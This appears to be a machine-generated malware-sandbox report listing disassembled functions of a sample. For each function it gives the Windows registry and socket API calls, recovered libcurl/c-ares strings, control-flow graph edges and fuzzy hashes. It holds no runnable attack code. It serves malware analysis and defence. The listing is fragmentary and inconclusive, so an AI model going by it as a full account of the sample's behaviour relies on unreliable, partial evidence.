                                                      • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 0052A4FB
                                                      • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 0052A531
                                                      • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 0052AA19
                                                      • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0052AA4C
                                                      • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 0052AA97
                                                      • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0052AAE9
                                                      • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0052AB30
                                                      • RegCloseKey.KERNELBASE(?), ref: 0052AB6A
                                                      • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 0052AB82
                                                      • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 0052AC46
                                                      • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 0052AD0A
                                                      • RegEnumKeyExA.KERNELBASE ref: 0052AD8D
                                                      • RegCloseKey.KERNELBASE(?), ref: 0052ADD9
                                                      • RegEnumKeyExA.KERNELBASE ref: 0052AE08
                                                      • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 0052AE2A
                                                      • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0052AE54
                                                      • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0052AF63
                                                      • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0052AFB2
                                                      • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 0052B072
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1459728015.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                      • Associated: 00000000.00000002.1459707893.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000A83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000A85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460147169.0000000000A88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000A8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000C14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000D2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E02000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460437376.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460546778.0000000000FD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460563663.0000000000FDB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_470000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID: QueryValue$Open$AdaptersAddresses$CloseEnum
                                                      • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                                                      • API String ID: 4281207131-1047472027
                                                      • Opcode ID: eb9c337e54244f796449d7026a7f296415f85969ec4f986f7ae5748ee99fbc2b
                                                      • Instruction ID: 30f694213e758ec880fb5e59c963ec9da2aad75c10b6ea3b6a127256a646fb59
                                                      • Opcode Fuzzy Hash: eb9c337e54244f796449d7026a7f296415f85969ec4f986f7ae5748ee99fbc2b
                                                      • Instruction Fuzzy Hash: 3572ADB1604311AFE720DB24DC85B6BBBE8BF86744F144828F989DB291E771E944CB53
                                                      Function 004AA550 Relevance: 28.8, APIs: 1, Strings: 15, Instructions: 794COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 004AA832
                                                      Strings
                                                      • Could not set TCP_NODELAY: %s, xrefs: 004AA871
                                                      • Bind to local port %d failed, trying next, xrefs: 004AAFE5
                                                      • Trying %s:%d..., xrefs: 004AA7C2, 004AA7DE
                                                      • Couldn't bind to '%s' with errno %d: %s, xrefs: 004AAE1F
                                                      • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 004AA6CE
                                                      • Local Interface %s is ip %s using address family %i, xrefs: 004AAE60
                                                      • cf_socket_open() -> %d, fd=%d, xrefs: 004AA796
                                                      • bind failed with errno %d: %s, xrefs: 004AB080
                                                      • Trying [%s]:%d..., xrefs: 004AA689
                                                      • Local port: %hu, xrefs: 004AAF28
                                                      • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 004AAD0A
                                                      • Name '%s' family %i resolved to '%s' family %i, xrefs: 004AADAC
                                                      • @, xrefs: 004AA8F4
                                                      • cf-socket.c, xrefs: 004AA5CD, 004AA735
                                                      • @, xrefs: 004AAC42
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1459728015.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                      • Associated: 00000000.00000002.1459707893.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000A83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000A85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460147169.0000000000A88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000A8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000C14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000D2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E02000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460437376.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460546778.0000000000FD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460563663.0000000000FDB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_470000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID: setsockopt
                                                      • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                                      • API String ID: 3981526788-2373386790
                                                      • Opcode ID: 6100f23f802b5409d051d73ca1bbf4bba3253efcea11746aa8e72ad9f1691392
                                                      • Instruction ID: 3b403fbf322c145d9b47d6022d120b8a262ea11c4aecf20f25dc1ae84e634d1f
                                                      • Opcode Fuzzy Hash: 6100f23f802b5409d051d73ca1bbf4bba3253efcea11746aa8e72ad9f1691392
                                                      • Instruction Fuzzy Hash: 52621571504340ABE721CF14C846BABB3E4FFA2318F04491EF98897292E779E855CB97
                                                      Function 00539740 Relevance: 16.5, APIs: 3, Strings: 6, Instructions: 743registryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 974 539740-53975b 975 539780-539782 974->975 976 53975d-539768 call 5378a0 974->976 978 539914-53994e call 7f8b70 RegOpenKeyExA 975->978 979 539788-5397a0 call 7f8e00 call 5378a0 975->979 983 5399bb-5399c0 976->983 984 53976e-539770 976->984 991 539950-539955 978->991 992 53995a-539992 RegQueryValueExA RegCloseKey call 7f8b98 978->992 979->983 988 5397a6-5397c5 979->988 989 539a0c-539a15 983->989 987 539772-53977e 984->987 984->988 987->979 998 539827-539833 988->998 999 5397c7-5397e0 988->999 991->989 1002 539997-5399b5 call 5378a0 992->1002 1003 539835-53985c call 52e2b0 * 2 998->1003 1004 53985f-539872 call 535ca0 998->1004 1000 5397e2-5397f3 call 7f8b50 999->1000 1001 5397f6-539809 999->1001 1000->1001 1001->998 1013 53980b-539810 1001->1013 1002->983 1002->988 1003->1004 1014 5399f0 1004->1014 1015 539878-53987d call 5377b0 1004->1015 1013->998 1018 539812-539822 1013->1018 1017 5399f5-5399fb call 535d00 1014->1017 1023 539882-539889 1015->1023 1028 5399fe-539a09 1017->1028 1018->989 1023->1017 1027 53988f-53989b call 524fe0 1023->1027 1027->1014 1033 5398a1-5398c3 call 7f8b50 call 5378a0 1027->1033 1028->989 1038 5399c2-5399ed call 52e2b0 * 2 1033->1038 1039 5398c9-5398db call 52e2d0 1033->1039 1038->1014 1039->1038 1043 5398e1-5398f0 call 52e2d0 1039->1043 1043->1038 1049 5398f6-539905 call 5363f0 1043->1049 1054 539f66-539f7f call 535d00 1049->1054 1055 53990b-53990f 1049->1055 1054->1028 1057 539a3f-539a5a call 536740 call 5363f0 1055->1057 1057->1054 1063 539a60-539a6e call 536d60 1057->1063 1066 539a70-539a94 call 536200 call 5367e0 call 536320 1063->1066 1067 539a1f-539a39 call 536840 call 5363f0 1063->1067 1078 539a16-539a19 1066->1078 1079 539a96-539ac6 call 52d120 1066->1079 1067->1054 1067->1057 1078->1067 1080 539fc1 1078->1080 1084 539ae1-539af7 call 52d190 1079->1084 1085 539ac8-539adb call 52d120 1079->1085 1083 539fc5-539ffd call 535d00 call 52e2b0 * 2 1080->1083 1083->1028 1084->1067 1092 539afd-539b09 call 524fe0 1084->1092 1085->1067 1085->1084 1092->1080 1099 539b0f-539b29 call 52e730 1092->1099 1104 539f84-539f88 1099->1104 1105 539b2f-539b3a call 5378a0 1099->1105 1106 539f95-539f99 1104->1106 1105->1104 1111 539b40-539b54 call 52e760 1105->1111 1108 539fa0-539fb6 call 52ebf0 * 2 1106->1108 1109 539f9b-539f9e 1106->1109 1121 539fb7-539fbe 1108->1121 1109->1080 1109->1108 1117 539f8a-539f92 1111->1117 1118 539b5a-539b6e call 52e730 1111->1118 1117->1106 1124 539b70-53a004 1118->1124 1125 539b8c-539b97 call 5363f0 1118->1125 1121->1080 1129 53a015-53a01d 1124->1129 1133 539c9a-539cab call 52ea00 1125->1133 1134 539b9d-539bbf call 536740 call 5363f0 1125->1134 1131 53a024-53a045 call 52ebf0 * 2 1129->1131 1132 53a01f-53a022 1129->1132 1131->1083 1132->1083 1132->1131 1142 539f31-539f35 1133->1142 1143 539cb1-539ccd call 52ea00 call 52e960 1133->1143 1134->1133 1151 539bc5-539bda call 536d60 1134->1151 1147 539f40-539f61 call 52ebf0 * 2 1142->1147 1148 539f37-539f3a 1142->1148 1162 539ccf 1143->1162 1163 539cfd-539d0e call 52e960 1143->1163 1147->1067 1148->1067 1148->1147 1151->1133 1161 539be0-539bf4 call 536200 call 5367e0 1151->1161 1161->1133 1182 539bfa-539c0b call 536320 1161->1182 1166 539cd1-539cec call 52e9f0 call 52e4a0 1162->1166 1171 539d53-539d55 1163->1171 1172 539d10 1163->1172 1183 539d47-539d51 1166->1183 1184 539cee-539cfb call 52e9d0 1166->1184 1175 539e69-539e8e call 52ea40 call 52e440 1171->1175 1176 539d12-539d2d call 52e9f0 call 52e4a0 1172->1176 1199 539e90-539e92 1175->1199 1200 539e94-539eaa call 52e3c0 1175->1200 1203 539d5a-539d6f call 52e960 1176->1203 1204 539d2f-539d3c call 52e9d0 1176->1204 1197 539c11-539c1c call 537b70 1182->1197 1198 539b75-539b86 call 52ea00 1182->1198 1188 539dca-539ddb call 52e960 1183->1188 1184->1163 1184->1166 1209 539e2e-539e36 1188->1209 1210 539ddd-539ddf 1188->1210 1197->1125 1214 539c22-539c33 call 52e960 1197->1214 1198->1125 1220 539f2d 1198->1220 1207 539eb3-539ec4 call 52e9c0 1199->1207 1230 539eb0-539eb1 1200->1230 1231 53a04a-53a04c 1200->1231 1226 539dc2 1203->1226 1227 539d71-539d73 1203->1227 1204->1176 1223 539d3e-539d42 1204->1223 1207->1067 1239 539eca-539ed0 1207->1239 1216 539e38-539e3b 1209->1216 1217 539e3d-539e5b call 52ebf0 * 2 1209->1217 1219 539e06-539e21 call 52e9f0 call 52e4a0 1210->1219 1241 539c66-539c75 call 5378a0 1214->1241 1242 539c35 1214->1242 1216->1217 1228 539e5e-539e67 1216->1228 1217->1228 1257 539e23-539e2c call 52eac0 1219->1257 1258 539de1-539dee call 52ec80 1219->1258 1220->1142 1223->1175 1226->1188 1237 539d9a-539db5 call 52e9f0 call 52e4a0 1227->1237 1228->1175 1228->1207 1230->1207 1235 53a057-53a070 call 52ebf0 * 2 1231->1235 1236 53a04e-53a051 1231->1236 1235->1121 1236->1080 1236->1235 1271 539db7-539dc0 call 52eac0 1237->1271 1272 539d75-539d82 call 52ec80 1237->1272 1240 539ee5-539ef2 call 52e9f0 1239->1240 1240->1067 1263 539ef8-539f0e call 52e440 1240->1263 1268 53a011 1241->1268 1269 539c7b-539c8f call 52e7c0 1241->1269 1248 539c37-539c51 call 52e9f0 1242->1248 1248->1125 1287 539c57-539c64 call 52e9d0 1248->1287 1281 539df1-539e04 call 52e960 1257->1281 1258->1281 1285 539ed2-539edf call 52e9e0 1263->1285 1286 539f10-539f26 call 52e3c0 1263->1286 1268->1129 1269->1125 1282 539c95-53a00e 1269->1282 1291 539d85-539d98 call 52e960 1271->1291 1272->1291 1281->1209 1281->1219 1282->1268 1285->1067 1285->1240 1286->1285 1301 539f28 1286->1301 1287->1241 1287->1248 1291->1226 1291->1237 1301->1080
                                                      APIs
                                                      • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00539946
                                                      • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00539974
                                                      • RegCloseKey.KERNELBASE(?), ref: 0053998B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1459728015.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                      • Associated: 00000000.00000002.1459707893.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000A83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000A85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460147169.0000000000A88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000A8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000C14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000D2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E02000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460437376.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460546778.0000000000FD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460563663.0000000000FDB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_470000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID: CloseOpenQueryValue
                                                      • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos
                                                      • API String ID: 3677997916-615551945
                                                      • Opcode ID: c8cd8ebb13d497cb0bc0de6820d281a36585221997b55909789f2176e1e4c64a
                                                      • Instruction ID: 1010fd060d5dd4d1a84093ea04cab2c36889874009d4831d0e92f6d4cb64935a
                                                      • Opcode Fuzzy Hash: c8cd8ebb13d497cb0bc0de6820d281a36585221997b55909789f2176e1e4c64a
                                                      • Instruction Fuzzy Hash: F932A6F5904202ABEB11AB24EC47A1BBFA4BF95314F084838F90996263F771ED14D793
                                                      Function 004A8B50 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 269networkCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1302 4a8b50-4a8b69 1303 4a8b6b-4a8b74 1302->1303 1304 4a8be6 1302->1304 1306 4a8beb-4a8bf2 1303->1306 1307 4a8b76-4a8b8d 1303->1307 1305 4a8be9 1304->1305 1305->1306 1308 4a8b8f-4a8ba7 call 486e40 1307->1308 1309 4a8bf3-4a8bfe call 4aa550 1307->1309 1316 4a8cd9-4a8d16 SleepEx getsockopt 1308->1316 1317 4a8bad-4a8baf 1308->1317 1314 4a8de4-4a8def 1309->1314 1315 4a8c04-4a8c08 1309->1315 1318 4a8e8c-4a8e95 1314->1318 1319 4a8df5-4a8e19 call 4aa150 1314->1319 1320 4a8c0e-4a8c1d 1315->1320 1321 4a8dbd-4a8dc3 1315->1321 1324 4a8d18-4a8d20 1316->1324 1325 4a8d22 1316->1325 1322 4a8ca6-4a8cb0 1317->1322 1323 4a8bb5-4a8bb9 1317->1323 1327 4a8f00-4a8f06 1318->1327 1328 4a8e97-4a8e9c 1318->1328 1361 4a8e1b-4a8e26 1319->1361 1362 4a8e88 1319->1362 1330 4a8c1f-4a8c30 connect 1320->1330 1331 4a8c35-4a8c48 call 4aa150 1320->1331 1321->1305 1322->1316 1332 4a8cb2-4a8cb8 1322->1332 1323->1306 1333 4a8bbb-4a8bc2 1323->1333 1326 4a8d26-4a8d39 1324->1326 1325->1326 1335 4a8d3b-4a8d3d 1326->1335 1336 4a8d43-4a8d61 call 48d8c0 call 4aa150 1326->1336 1327->1306 1337 4a8e9e-4a8eb6 call 482a00 1328->1337 1338 4a8edf-4a8eef call 4778b0 1328->1338 1330->1331 1363 4a8c4d-4a8c4f 1331->1363 1340 4a8cbe-4a8cd4 call 4ab180 1332->1340 1341 4a8ddc-4a8dde 1332->1341 1333->1306 1342 4a8bc4-4a8bcc 1333->1342 1335->1336 1335->1341 1365 4a8d66-4a8d74 1336->1365 1337->1338 1360 4a8eb8-4a8edd call 483410 * 2 1337->1360 1358 4a8ef2-4a8efc 1338->1358 1340->1314 1341->1305 1341->1314 1348 4a8bce-4a8bd2 1342->1348 1349 4a8bd4-4a8bda 1342->1349 1348->1306 1348->1349 1349->1306 1350 4a8bdc-4a8be1 1349->1350 1357 4a8dac-4a8db8 call 4b50a0 1350->1357 1357->1306 1358->1327 1360->1358 1367 4a8e28-4a8e2c 1361->1367 1368 4a8e2e-4a8e85 call 48d090 call 4b4fd0 1361->1368 1362->1318 1369 4a8c8e-4a8c93 1363->1369 1370 4a8c51-4a8c58 1363->1370 1365->1306 1376 4a8d7a-4a8d81 1365->1376 1367->1362 1367->1368 1368->1362 1374 4a8dc8-4a8dd9 call 4ab100 1369->1374 1375 4a8c99-4a8c9f 1369->1375 1370->1369 1372 4a8c5a-4a8c62 1370->1372 1379 4a8c6a-4a8c70 1372->1379 1380 4a8c64-4a8c68 1372->1380 1374->1341 1375->1322 1376->1306 1382 4a8d87-4a8d8f 1376->1382 1379->1369 1384 4a8c72-4a8c8b call 4b50a0 1379->1384 1380->1369 1380->1379 1386 4a8d9b-4a8da1 1382->1386 1387 4a8d91-4a8d95 1382->1387 1384->1369 1386->1306 1391 4a8da7 1386->1391 1387->1306 1387->1386 1391->1357
                                                      APIs
                                                      • connect.WS2_32(?,?,00000001), ref: 004A8C30
                                                      • SleepEx.KERNELBASE(00000000,00000000), ref: 004A8CF3
                                                      • getsockopt.WS2_32(?,0000FFFF,00001007,00000000,00000004), ref: 004A8D0E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1459728015.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                      • Associated: 00000000.00000002.1459707893.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000A83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000A85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460147169.0000000000A88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000A8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000C14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000D2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E02000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460437376.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460546778.0000000000FD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460563663.0000000000FDB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_470000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID: Sleepconnectgetsockopt
                                                      • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                                      • API String ID: 1669343778-879669977
                                                      • Opcode ID: 3159bff87f1b232dbd4ccf4fb7a2b4bc2b9e68f672fdfce1203b18076c93c734
                                                      • Instruction ID: 64b9849e2276cb01fc5d59d4efe27920a531996bb295b5ac449870a09841949c
                                                      • Opcode Fuzzy Hash: 3159bff87f1b232dbd4ccf4fb7a2b4bc2b9e68f672fdfce1203b18076c93c734
                                                      • Instruction Fuzzy Hash: 61B1AF70604705AFD710DF24C885BA7B7A0EF66318F04892EF8598B3D2DB78E855CB66
                                                      Function 00472F17 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 144registryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1488 472f17-472f8c call 8af570 call 8af960 1493 4731c9-4731cd 1488->1493 1494 4731d3-4731d6 1493->1494 1495 472f91-472ff4 call 471619 RegOpenKeyExA 1493->1495 1498 4731c5 1495->1498 1499 472ffa-47300b 1495->1499 1498->1493 1500 47315c-4731ac RegEnumKeyExA 1499->1500 1501 4731b2-4731c2 1500->1501 1502 473010-473083 call 471619 RegOpenKeyExA 1500->1502 1501->1498 1506 47314e-473152 1502->1506 1507 473089-4730d4 RegQueryValueExA 1502->1507 1506->1500 1508 4730d6-473137 call 8af840 call 8af8d0 call 8af960 call 8af770 call 8af960 call 8adce0 1507->1508 1509 47313b-47314b RegCloseKey 1507->1509 1508->1509 1509->1506
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1459728015.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                      • Associated: 00000000.00000002.1459707893.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000A83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000A85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460147169.0000000000A88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000A8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000C14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000D2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E02000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460437376.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460546778.0000000000FD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460563663.0000000000FDB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_470000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID: EnumOpen
                                                      • String ID: d
                                                      • API String ID: 3231578192-2564639436
                                                      • Opcode ID: d3c18362f92fdf9ec4aa6fec70dfbe1793682c555c5078fd2b9291a52fae003f
                                                      • Instruction ID: 392816f6dc9413e11cf050735c732a02fec88c6e22fa8b38c8e4409db543c4e5
                                                      • Opcode Fuzzy Hash: d3c18362f92fdf9ec4aa6fec70dfbe1793682c555c5078fd2b9291a52fae003f
                                                      • Instruction Fuzzy Hash: FF71B4B49043199FDB50DF69D58479EBBF0FF84318F10886DE89897311E7749A888F92
                                                      Function 004776A0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 73networkCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1522 4776a0-4776be 1523 4776e6-4776f2 send 1522->1523 1524 4776c0-4776c7 1522->1524 1526 4776f4-477709 call 4772a0 1523->1526 1527 47775e-477762 1523->1527 1524->1523 1525 4776c9-4776d1 1524->1525 1528 4776d3-4776e4 1525->1528 1529 47770b-477759 call 4772a0 call 47cb20 call 7f8c50 1525->1529 1526->1527 1528->1526 1529->1527
                                                      APIs
                                                      • send.WS2_32(multi.c,?,?,?,N=G,00000000,?,?,004807BF), ref: 004776EB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1459728015.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                      • Associated: 00000000.00000002.1459707893.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000A83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000A85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460147169.0000000000A88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000A8A000.00000040.00000001.01000000.00000003.sdmpDownload File
